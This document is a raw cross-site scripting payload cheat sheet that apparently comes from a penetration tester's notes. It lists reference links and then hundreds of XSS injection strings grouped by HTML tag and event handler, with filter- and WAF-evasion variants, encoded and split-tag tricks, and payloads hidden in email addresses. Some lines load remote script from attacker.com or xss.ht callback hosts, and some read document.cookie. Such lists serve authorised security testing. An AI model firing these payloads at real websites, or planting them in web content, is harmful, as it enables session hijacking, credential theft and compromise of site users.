
https://netsec.expert/posts/xss-in-2021/
-----------------------------------------
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
-----------------------------------------
https://github.com/codebox/homoglyph/blob/master/raw_data/chars.txt
-----------------------------------------
https://brutelogic.com.br/blog/wp-content/uploads/2021/09/Brute-XSS-Cheat-Sheet-Sample.pdf
-----------------------------------------
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
-----------------------------------------
http://brutelogic.com.br/poc.svg

Basic payload

'';! - "<XSS>=&{()}
{3*3}
{{3*3}}
{{ 7* 7 }}
'-alert(1)-'
naber';alert(1);'hello
test';alert(1);a='test
test';alert`1`;a='test
<script>alert(1)</script>
"><img src=x onerror=alert(1)>
'/><script>alert(1)</script>
');function atob(){alert(1)}('
<a href="/*">*/)});
function+__MobileAppList(){alert(1)}//>
javascript:alert(1)
"><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
data:text/plain,alert("hi")
</script><script>alert(1)</script>
\'-alert(1)//
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
"><script src="https://js.rip/<custom.name>"></script>
"><script src=//<custom.subdomain>.xss.ht></script>
<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
<sCrIpt>alert(1)</ScRipt>
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
<script x>
<script x>alert('XSS')<script y>
http://foo?&apos;-alert(1)-&apos;
</title><script>alert(1)</script>
</noscript><script>alert(1)</script>
</style><script>alert(1)</script>
%26apos;-alert(1)-%26apos;
</h1><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
"autofocus onfocus=alert(1)//
'autofocus onfocus=alert(1)//
</textarea><script>alert(1)</script>
</script><script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
'-alert(1)-'
"-alert(1)-"
\'-alert(1)//
\"-alert(1)//	
᾿</script><script>alert(1)</script> bunun sonucuna bak
\``-alert(1)//
\`-alert(1)//
${alert(1)}
javascript://%250Aalert(1)//?0
"></iframe><script>alert(1)</script>
1%0D%0AContent-Type:text/html%0D%0A<svg/onload=alert(1)>
/alert(1)//\
<div onpointerover="alert(1)">tikla</div>
"autofocus onfocus=alert(1)//
--><script>alert(1)</script>
<!----><script>alert(1)</script>-->
\74img/src/onerror=alert(1)\76
"autofocus onfocus=alert(1)//
"><script>alert(1)</script>
<base/href=//X55.is>
\u003e\u003cimg src=1 onerror=alert(0)\u003e
“-prompt`1`-”//
);alert(1);//></script>
" onmouseover="alert(1)
</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)>”
“ OnMouseOver=”prompt`1`
<scr<script>ipt>alert(1)</scr</script>ipt>
”><iframe/src=javascript&colon;[document&period;domain].find(alert)>
<scr<script>ipt>alert(1)</scr</script>ipt>
'>"></title></style></textarea></script><script/src=attacker.com/js></script>
javascript:atob`PGltZyBzcmM9MSBvbmVycm9yPWFsZXJ0KCJIZWxsbyIpPg==`
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
Bob%0d%0a%0d%0a<script>alert(document.domain)</script>
java%0d%0ascript%0d%0a:alert(0)
j%0d%0aava%0d%0aas%0d%0acrip%0d%0at%0d%0a:confirm`0`
java%07script:prompt`0`
java%09scrip%07t:prompt`0`
jjavascriptajavascriptvjavascriptajavascriptsjavascriptcjavascriptrjavascriptijavascript
pjavascriptt:confirm`0`
<svg onload=a=')',b='t(1',j='javas',s='cript:aler',location=j+s+b+a>
<svg onload=innerHTML='\74img/src/onerror\75alert\501\51\76'>
<svg onload=a='\51\76',b='t\501',i='\74img/src/one',m='rror\75aler',innerHTML=i+m+b+a>
<svg onload=location=textContent>javascript:alert(1)//


Homoglyph
https://jlajara.gitlab.io/Bypass_WAF_Unicode
	--＞test＜img src=# onerror=alert(document.domain)＞

Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>


Svg payload
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg onload=a=')',b='t(1',j='javas',s='cript:aler',location=j+s+b+a>
<svg onload=innerHTML='\74img/src/onerror\75alert\501\51\76'>
<svg onload=a='\51\76',b='t\501',i='\74img/src/one',m='rror\75aler',innerHTML=i+m+b+a>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))> 
<svg><set onbegin=d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b>
<svg onload=location=textContent>javascript:alert(1)//
<svg onload=location=nextSibling.innerText><b>javas<b></b>cript:al<b></b>ert(1)</b>
<svg onload=location=nextSibling.innerText><b>javas<b></b>cript:al<b></b>ert(<b>1</b>)</b>
<svg onload=innerHTML=nextSibling.innerText><b><img/src/on<r></r>error=al<u></u>ert(<te>1</te>)>< /b>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
"autofocus%20onfocus="alert(1)
'autofocus%20onfocus='alert(1)


Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)>   // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>  // When a finger is dragged across the screen.
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
javascript:prompt(1)

OTHER
java%0ascript:alert(1) 
java%09script:alert(1)
java%0dscript:alert(1)  
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)

<input type="hidden" accesskey="X" onclick="alert(1)">  =>Windows'ta ALT+SHIFT+X tuşlarına basın

<link rel="canonical" accesskey="X" onclick="alert(1)" />  =Windows'ta ALT+SHIFT+X tuşlarına basın


TRICKS
%26apos; = &
\74 = <
\76 = >
------------------------------------------------------
Email
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
["');alert('XSS');//"]@xyz.xxx
“><svg/onload=confirm(1)>”@gmail.com
"><svg/onload=alert(1)>"@x.y


------------------------------------------------------
